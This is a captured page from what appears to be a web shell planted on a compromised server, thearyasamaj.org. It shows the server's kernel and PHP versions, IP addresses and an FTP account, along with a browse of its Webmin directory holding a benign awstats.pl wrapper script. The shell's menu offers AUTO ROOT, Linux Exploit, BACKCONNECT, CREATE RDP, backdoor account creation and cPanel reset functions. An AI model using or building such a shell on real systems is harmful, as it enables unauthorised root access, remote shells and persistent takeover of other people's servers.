Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
webmin /
virtualmin-awstats /
[ HOME SHELL ]
Name
Size
Permission
Action
awstats.pl
541
B
-rwxr-xr-x
config
208
B
-rw-r--r--
runas
486
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : awstats.pl
#!/usr/bin/perl open(CONF, "</etc/webmin/miniserv.conf") || die "Failed to open /etc/webmin/miniserv.conf : $!"; while(<CONF>) { $root = $1 if (/^root=(.*)/); } close(CONF); $root || die "No root= line found in /etc/webmin/miniserv.conf"; $ENV{'PERLLIB'} = "$root"; $ENV{'WEBMIN_CONFIG'} = "/etc/webmin"; $ENV{'WEBMIN_VAR'} = "/var/webmin"; delete($ENV{'MINISERV_CONFIG'}); chdir("$root/virtualmin-awstats"); exec("$root/virtualmin-awstats/awstats.pl", @ARGV) || die "Failed to run $root/virtualmin-awstats/awstats.pl : $!";
Close